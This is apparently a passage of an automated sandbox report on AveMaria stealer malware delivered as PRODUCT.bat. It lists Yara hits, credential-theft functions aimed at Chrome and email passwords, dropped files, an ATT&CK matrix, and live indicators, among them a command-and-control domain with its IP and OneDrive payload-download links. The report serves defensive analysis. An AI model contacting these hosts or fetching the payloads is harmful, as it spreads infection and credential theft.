Source: Yara match	File source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.123c8f48.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: \Google\Chrome\User Data\Default\Login Data	14_2_004100DE
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: \Chromium\User Data\Default\Login Data	14_2_0040EC28
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: \Google\Chrome\User Data\Default\Login Data	14_2_00415CC4
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: \Google\Chrome\User Data\Default\Login Data	14_2_00415CC4
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: \Google\Chrome\User Data\Default\Login Data	14_2_00415CC4
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: \Google\Chrome\User Data\Default\Login Data	14_2_00415CC4
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: \Google\Chrome\User Data\Default\Login Data	25_1_004100DE
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: \Chromium\User Data\Default\Login Data	25_1_0040EC28
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: \Google\Chrome\User Data\Default\Login Data	25_1_00415CC4
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: \Google\Chrome\User Data\Default\Login Data	25_1_00415CC4
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: \Google\Chrome\User Data\Default\Login Data	25_1_00415CC4
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: \Google\Chrome\User Data\Default\Login Data	25_1_00415CC4

Contains functionality to steal e-mail passwords

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: POP3 Password	14_2_0040C8FC
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: SMTP Password	14_2_0040C8FC
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: IMAP Password	14_2_0040C8FC
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: POP3 Password	25_1_0040C8FC
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: SMTP Password	25_1_0040C8FC
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: IMAP Password	25_1_0040C8FC

Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.1.dbkyovyK.pif.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.dbkyovyK.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pointer.com PID: 2596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dbkyovyK.pif PID: 6644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Kyvoykbd.PIF PID: 7344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dbkyovyK.pif PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dbkyovyK.pif PID: 7688, type: MEMORYSTR

Remote Access Functionality

Yara detected AveMaria stealer

Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.1.dbkyovyK.pif.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.126450d8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.dbkyovyK.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.Kyvoykbd.PIF.123a7f18.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.123c8f48.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CF0B80 AddClipboardFormatListener,		14_2_39CF0B80
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CF0AE0 RemoveClipboardFormatListener,		14_2_39CF0AE0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Valid Accounts	12 Native API	1 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	22 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	1 DLL Side-Loading	1 Valid Accounts	2 Obfuscated Files or Information	121 Input Capture	1 Peripheral Device Discovery	Remote Desktop Protocol	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Bluetooth	1 Endpoint Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	11 Create Account	11 Access Token Manipulation	2 Software Packing	1 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	121 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Valid Accounts	11 Windows Service	1 Timestomp	NTDS	11 System Network Connections Discovery	Distributed Component Object Model	3 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	11 Windows Service	422 Process Injection	1 DLL Side-Loading	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	223 Masquerading	Cached Domain Credentials	35 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	241 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Virtualization/Sandbox Evasion	Proc Filesystem	1 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Access Token Manipulation	/etc/passwd and /etc/shadow	2 Process Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	422 Process Injection	Network Sniffing	11 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Users	Keylogging	1 System Network Configuration Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PRODUCT.bat	0%	ReversingLabs
PRODUCT.bat	3%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\pointer.com	100%	Joe Sandbox ML
C:\Users\Public\Libraries\netutils.dll	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Kyvoykbd.PIF	100%	Joe Sandbox ML
C:\Users\Public\Libraries\dbkyovyK.pif	3%	ReversingLabs
C:\Users\Public\Libraries\dbkyovyK.pif	0%	Virustotal		Browse
C:\Users\Public\Libraries\easinvoker.exe	0%	ReversingLabs
C:\Users\Public\Libraries\easinvoker.exe	0%	Virustotal		Browse
C:\Users\Public\Libraries\netutils.dll	34%	ReversingLabs	Win64.Trojan.Generic
C:\Users\Public\Libraries\netutils.dll	43%	Virustotal		Browse
C:\Users\Public\Libraries\truesight.sys	8%	ReversingLabs
C:\Users\Public\Libraries\truesight.sys	6%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
dual-spov-0006.spov-msedge.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	0%	URL Reputation	safe
http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
burger042.ddnsfree.com	100%	Avira URL Cloud	phishing
http://www.pmail.com0	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0C	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dual-spov-0006.spov-msedge.net	13.107.139.11	true	true	0%, Virustotal, Browse	unknown
burger042.ddnsfree.com	91.92.254.111	true	true		unknown
onedrive.live.com	unknown	unknown	false		high
8rxyhq.am.files.1drv.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
burger042.ddnsfree.com	true	Avira URL Cloud: phishing	unknown
https://onedrive.live.com/download?resid=BF523B4A9B64BC6C%21135&authkey=!AJFtRaE0WfJwO6E	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://8rxyhq.am.files.1drv.com/y4m6qczzBL-6Qgtp1_yGbwbc99ja1thGmpqx8uKxVY_xbxl3fkf2m3OFPmzYatw08dZ	Kyvoykbd.PIF, 00000017.00000003.1835151143.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://onedrive.live.com/-	Kyvoykbd.PIF, 00000017.00000003.1835151143.000000000076C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://8rxyhq.am.files.1drv.com/y4mfBiglz8YyU9V3b3twgGQe0LQySDhgpDCtOzTrQ45ntYAryOp4shjIaZZfsmf7IW7	pointer.com, 00000008.00000002.1699425872.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	false	URL Reputation: safe	unknown
http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/	certutil.exe, 00000003.00000003.1637088713.000002599966D000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000000.1646787400.0000000000451000.00000008.00000001.01000000.00000004.sdmp, pointer.com, 00000008.00000002.1702806735.0000000002890000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1691476533.000000007EB40000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1690060768.00000000122F3000.00000004.00000020.00020000.00000000.sdmp, pointer.com.3.dr, Kyvoykbd.PIF.8.dr	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	false	URL Reputation: safe	unknown
https://8rxyhq.am.files.1drv.com/y4mAdmSw0kHlKdlZ_	pointer.com, 00000008.00000002.1700601640.00000000007C7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://8rxyhq.am.files.1drv.com:443/y4mUAP1ymrBd-yTUK-CEq_HTtBVr8tWG7SWIhrccYhDE7W1JTuqN9h-qN3t2eBC	Kyvoykbd.PIF, 0000001A.00000002.1904801201.0000000000767000.00000004.00000020.00020000.00000000.sdmp, Kyvoykbd.PIF, 0000001A.00000003.1903375914.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false		high
https://8rxyhq.am.files.1drv.com/	pointer.com, 00000008.00000002.1699425872.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Kyvoykbd.PIF, 0000001A.00000003.1903375914.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false		high
https://8rxyhq.am.files.1drv.com/y4mUAP1ymrBd-yTUK-CEq_HTtBVr8tWG7SWIhrccYhDE7W1JTuqN9h-qN3t2eBC5jBZ	Kyvoykbd.PIF, 0000001A.00000003.1903375914.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/syohex/java-simple-mine-sweeper	dbkyovyK.pif	false		high
https://onedrive.live.com/	pointer.com, 00000008.00000002.1699425872.00000000006EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://8rxyhq.am.files.1drv.com:443/y4mfBiglz8YyU9V3b3twgGQe0LQySDhgpDCtOzTrQ45ntYAryOp4shjIaZZfsmf	pointer.com, 00000008.00000002.1699425872.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://onedrive.live.com/download?resid=BF523B4A9B64BC6C%21135&authkey=	Kyvoykbd.PIF, 0000001A.00000003.1903375914.00000000006E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://8rxyhq.am.files.1drv.com:443/y4m6qczzBL-6Qgtp1_yGbwbc99ja1thGmpqx8uKxVY_xbxl3fkf2m3OFPmzYatw	Kyvoykbd.PIF, 00000017.00000002.1836525497.0000000000819000.00000004.00000020.00020000.00000000.sdmp, Kyvoykbd.PIF, 00000017.00000003.1835151143.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://live.com/	Kyvoykbd.PIF, 00000017.00000003.1835151143.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://live.com/on	Kyvoykbd.PIF, 0000001A.00000002.1904801201.0000000000767000.00000004.00000020.00020000.00000000.sdmp, Kyvoykbd.PIF, 0000001A.00000003.1903375914.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false		high
https://live.com/BpR3C	pointer.com, 00000008.00000002.1699425872.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://8rxyhq.am.files.1drv.com/p	Kyvoykbd.PIF, 00000017.00000003.1835151143.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://8rxyhq.am.files.1drv.com/y4mAdmSw0kHlKdlZ_V9zK5Rp4Inwn0d8s0sA90wD5LhatoPDxN7O8W4csICtjQFNHdL	Kyvoykbd.PIF, 0000001A.00000003.1903375914.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/syohex/java-simple-mine-sweeperC:	pointer.com, 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp, 